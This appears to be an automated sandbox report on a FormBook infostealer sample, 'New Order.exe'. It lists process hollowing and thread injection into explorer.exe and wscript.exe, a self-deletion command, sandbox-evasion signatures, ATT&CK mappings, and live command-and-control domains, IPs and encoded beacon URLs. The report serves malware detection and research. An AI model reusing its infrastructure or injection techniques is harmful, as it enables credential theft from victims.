Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05471DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_055105AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0547A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054DC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0546746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0547AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05501C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0551740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0547BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05518CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_055014FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0545849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0545EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0545FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05518F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0547A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0546F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0551070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Order.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wscript.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exe | Network Connect: 192.155.181.250 80
Source: C:\Windows\explorer.exe | Domain query: www.ayanmobile.com
Source: C:\Windows\SysWOW64\wscript.exe | Domain query: www.ty-valve.com
Source: C:\Windows\explorer.exe | Domain query: www.cuttingemporium.com
Source: C:\Windows\explorer.exe | Domain query: www.securenotifications.com
Source: C:\Windows\explorer.exe | Domain query: www.collectordrive.com
Source: C:\Windows\explorer.exe | Network Connect: 35.209.88.35 80
Source: C:\Windows\explorer.exe | Domain query: www.dietsz.com
Source: C:\Windows\explorer.exe | Domain query: www.optimismactivism.com
Source: C:\Windows\explorer.exe | Domain query: www.gangju123.com
Source: C:\Windows\explorer.exe | Network Connect: 107.161.23.204 80
Source: C:\Windows\explorer.exe | Network Connect: 208.91.197.91 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 160.153.78.1 80
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\New Order.exe | Section loaded: unknown target: C:\Users\user\Desktop\New Order.exe protection: execute and read and write
Source: C:\Users\user\Desktop\New Order.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\New Order.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\New Order.exe | Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\wscript.exe | Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\New Order.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\New Order.exe | Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: DF0000
Source: C:\Users\user\Desktop\New Order.exe | Process created: C:\Users\user\Desktop\New Order.exe 'C:\Users\user\Desktop\New Order.exe'
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New Order.exe'
Source: explorer.exe, 00000003.00000000.668700354.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000003.00000000.670473260.0000000001080000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.901778690.0000000003CE0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.670473260.0000000001080000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.901778690.0000000003CE0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.670473260.0000000001080000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.901778690.0000000003CE0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.670473260.0000000001080000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.901778690.0000000003CE0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.660941932.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPE

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API1 | Path Interception | Process Injection512 | Virtualization/Sandbox Evasion3 | OS Credential Dumping | Security Software Discovery131 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection512 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Clipboard Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information3 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing11 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Behavior Graph

[Behavior graph image not reproduced] Behavior Graph ID: 438531, Sample: New Order.exe, Startdate: 22/06/2021, Architecture: WINDOWS, Score: 100.
Root node: DNS/IP info www.occasionalassistant.com and occasionalassistant.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 7 other signatures.
New Order.exe: drops C:\Users\user\AppData\Local\Temp\vsfjb (DOS) and C:\Users\user\AppData\Local\...\System.dll (PE32); Maps a DLL or memory area into another process; starts a second New Order.exe (Sample uses process hollowing technique; Queues an APC in another process (thread injection)).
explorer.exe: DNS/IP info www.ty-valve.com 192.155.181.250, 80 (TELECOM-HKHongKongTelecomGlobalDataCentreHK, United States), www.securenotifications.com 35.209.88.35, 49778, 80 (GOOGLE-2US, United States), 11 other IPs or domains; System process connects to network (likely due to code injection or exploit); starts wscript.exe.
wscript.exe: DNS/IP info www.ty-valve.com and 192.168.2.1 (unknown); System process connects to network (likely due to code injection or exploit); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; starts cmd.exe, which starts conhost.exe.

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
New Order.exe | 37% | ReversingLabs | Win32.Spyware.Noon
New Order.exe | 100% | Joe Sandbox ML |

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nssD6D3.tmp\System.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\nssD6D3.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\vsfjb | 2% | ReversingLabs |

          Unpacked PE Files

Source | Detection | Scanner | Label
2.0.New Order.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
5.2.wscript.exe.34180a8.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
5.2.wscript.exe.5957960.6.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.0.New Order.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
0.2.New Order.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
2.1.New Order.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.2.New Order.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.New Order.exe.22a0000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.collectordrive.com/de52/?z6Ad_8Jp=q/8Nbvd67YPMVz3o7HcOnLFi8lrYmwA47pjKffLVRoseAGTrTNs7CZxo0gnZJZCgi/pT&Yz=0bpDyT | 0% | Avira URL Cloud | safe
www.achainz.com/de52/ | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.cuttingemporium.com/de52/?z6Ad_8Jp=A6XO+ITKnQQbOEvUMrF2CVYLPv45kLd/uv2YdfW9vEZfPW6611dfa85KEkC5Wqh6gBNa&Yz=0bpDyT | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.occasionalassistant.com/de52/?z6Ad_8Jp=qb+cDyZ+/Kn0EiG8qAwackOr+Z8XD7HPsMVV4+H0Ra088mc2au++kj7rvX/qHs87RHMJ&Yz=0bpDyT | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.securenotifications.com/de52/?z6Ad_8Jp=/MwPCQmb8N4Awmw4mMKJPRGOCBQ0FmS8LiYPDqoyki9FgjxxSyxFyKWOR1kxSGqMaJan&Yz=0bpDyT | 0% | Avira URL Cloud | safe
http://www.gangju123.com/de52/?z6Ad_8Jp=KfmGdnK98UrOdo4kMnFtb2+M9fToEn1F+Gzo6oV5pCedLQ1HneT9cj2ied9UzRR+PF6A&Yz=0bpDyT | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.ayanmobile.com/de52/?z6Ad_8Jp=VjXAIgKfhvF8hRWD/e05oFFe9piey6xRf/uiJW4aXhiEfFySQTYX7BGVKv+i/OP+5wGQ&Yz=0bpDyT | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.optimismactivism.com/de52/?z6Ad_8Jp=LwTVedL55OWwkv7g5+M8qNIWWWhwOSQTlz2nKf3SzAUgx635MxYM24Oa4PrOeZWczuGU&Yz=0bpDyT | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.dietsz.com/de52/?z6Ad_8Jp=jbY8motXMJXjJrQ4SeyjR+FjRclRi1mJ8dBASwUO8jLWL5/FFIvWjS8rmQthPplPuKqV&Yz=0bpDyT | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cuttingemporium.com | 34.102.136.180 | true | false | | unknown
www.ty-valve.com | 192.155.181.250 | true | true | | unknown
www.securenotifications.com | 35.209.88.35 | true | true | | unknown
ayanmobile.com | 160.153.78.1 | true | true | | unknown
collectordrive.com | 34.102.136.180 | true | false | | unknown
parking.namesilo.com | 107.161.23.204 | true | false | | high
occasionalassistant.com | 34.102.136.180 | true | false | | unknown
www.dietsz.com | 208.91.197.91 | true | true | | unknown
optimismactivism.com | 34.102.136.180 | true | false | | unknown
www.ayanmobile.com | unknown | unknown | true | | unknown
www.occasionalassistant.com | unknown | unknown | true | | unknown
www.cuttingemporium.com | unknown | unknown | true | | unknown
www.collectordrive.com | unknown | unknown | true | | unknown
www.optimismactivism.com | unknown | unknown | true | | unknown
www.gangju123.com | unknown | unknown | true | | unknown

                                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.collectordrive.com/de52/?z6Ad_8Jp=q/8Nbvd67YPMVz3o7HcOnLFi8lrYmwA47pjKffLVRoseAGTrTNs7CZxo0gnZJZCgi/pT&Yz=0bpDyT | false | Avira URL Cloud: safe | unknown
www.achainz.com/de52/ | true | Avira URL Cloud: safe | low
http://www.cuttingemporium.com/de52/?z6Ad_8Jp=A6XO+ITKnQQbOEvUMrF2CVYLPv45kLd/uv2YdfW9vEZfPW6611dfa85KEkC5Wqh6gBNa&Yz=0bpDyT | false | Avira URL Cloud: safe | unknown
http://www.occasionalassistant.com/de52/?z6Ad_8Jp=qb+cDyZ+/Kn0EiG8qAwackOr+Z8XD7HPsMVV4+H0Ra088mc2au++kj7rvX/qHs87RHMJ&Yz=0bpDyT | false | Avira URL Cloud: safe | unknown
http://www.securenotifications.com/de52/?z6Ad_8Jp=/MwPCQmb8N4Awmw4mMKJPRGOCBQ0FmS8LiYPDqoyki9FgjxxSyxFyKWOR1kxSGqMaJan&Yz=0bpDyT | true | Avira URL Cloud: safe | unknown
http://www.gangju123.com/de52/?z6Ad_8Jp=KfmGdnK98UrOdo4kMnFtb2+M9fToEn1F+Gzo6oV5pCedLQ1HneT9cj2ied9UzRR+PF6A&Yz=0bpDyT | true | Avira URL Cloud: safe | unknown
http://www.ayanmobile.com/de52/?z6Ad_8Jp=VjXAIgKfhvF8hRWD/e05oFFe9piey6xRf/uiJW4aXhiEfFySQTYX7BGVKv+i/OP+5wGQ&Yz=0bpDyT | true | Avira URL Cloud: safe | unknown
http://www.optimismactivism.com/de52/?z6Ad_8Jp=LwTVedL55OWwkv7g5+M8qNIWWWhwOSQTlz2nKf3SzAUgx635MxYM24Oa4PrOeZWczuGU&Yz=0bpDyT | false | Avira URL Cloud: safe | unknown
http://www.dietsz.com/de52/?z6Ad_8Jp=jbY8motXMJXjJrQ4SeyjR+FjRclRi1mJ8dBASwUO8jLWL5/FFIvWjS8rmQthPplPuKqV&Yz=0bpDyT | true | Avira URL Cloud: safe | unknown

                                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | New Order.exe | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmp | false
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://fontfabrik.comexplorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://nsis.sf.net/NSIS_ErrorNew Order.exefalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.%s.comPAexplorer.exe, 00000003.00000000.648249693.0000000002B50000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              low
                                                              http://www.fonts.comexplorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.sandoll.co.krexplorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.sakkal.comexplorer.exe, 00000003.00000000.662259185.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown

                                                                Contacted IPs


                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.155.181.250 | www.ty-valve.com | United States | 132422 | TELECOM-HKHongKongTelecomGlobalDataCentreHK | true
107.161.23.204 | parking.namesilo.com | United States | 3842 | RAMNODEUS | false
208.91.197.91 | www.dietsz.com | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
35.209.88.35 | www.securenotifications.com | United States | 19527 | GOOGLE-2US | true
34.102.136.180 | cuttingemporium.com | United States | 15169 | GOOGLEUS | false
160.153.78.1 | ayanmobile.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

                                                                Private

                                                                IP
                                                                192.168.2.1

                                                                General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 438531
Start date: 22.06.2021
Start time: 18:04:14
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 2s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: New Order.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@11/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 28.5% (good quality ratio 26.4%)
• Quality average: 76.5%
• Quality standard deviation: 29.9%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• TCP packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 104.43.139.144, 104.42.151.234, 13.88.21.125, 20.82.210.154, 20.54.7.98, 40.112.88.60, 205.185.216.42, 205.185.216.10, 80.67.82.211, 80.67.82.235
• Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big: too many NtQueryValueKey calls found
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/438531/sample/New Order.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs


                                                                  Domains


                                                                  ASN

                                                                  5625F34DB586296794476E714CAEC94BD7FDA78622238.exeGet hashmaliciousBrowse
                                                                  • 209.99.40.222
                                                                  SKMBT69150632L.exeGet hashmaliciousBrowse
                                                                  • 208.91.197.39
                                                                  Poczta Polska Informacje o transakcjach2021.exeGet hashmaliciousBrowse
                                                                  • 208.91.197.39
                                                                  CIh8xCD9fi.exeGet hashmaliciousBrowse
                                                                  • 208.91.197.27
                                                                  0m445A5H66.exeGet hashmaliciousBrowse
                                                                  • 209.99.40.222
                                                                  Shipping Doc578.exeGet hashmaliciousBrowse
                                                                  • 209.99.40.222
                                                                  Invoice.exeGet hashmaliciousBrowse
                                                                  • 209.99.40.222
                                                                  Revised PI.exeGet hashmaliciousBrowse
                                                                  • 209.99.64.55
                                                                  TekDefense.exeGet hashmaliciousBrowse
                                                                  • 204.11.56.48
                                                                  10A7285287F351AE201EC72DEA640FD1EABF1A7C54955.exeGet hashmaliciousBrowse
                                                                  • 141.8.224.221
                                                                  919780-920390.exeGet hashmaliciousBrowse
                                                                  • 208.91.197.27
                                                                  03062021.exeGet hashmaliciousBrowse
                                                                  • 208.91.197.27
                                                                  PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                                  • 208.91.197.91
                                                                  PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                                  • 208.91.197.91
                                                                  TELECOM-HKHongKongTelecomGlobalDataCentreHK#U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                                                  • 163.53.16.248
                                                                  Quotation_05052021.Pdf.exeGet hashmaliciousBrowse
                                                                  • 194.145.196.19
                                                                  pYWw8rJe5q.exeGet hashmaliciousBrowse
                                                                  • 43.229.153.157
                                                                  nmGAaaF18P.exeGet hashmaliciousBrowse
                                                                  • 43.229.153.157
                                                                  RZpEmlKOcv.exeGet hashmaliciousBrowse
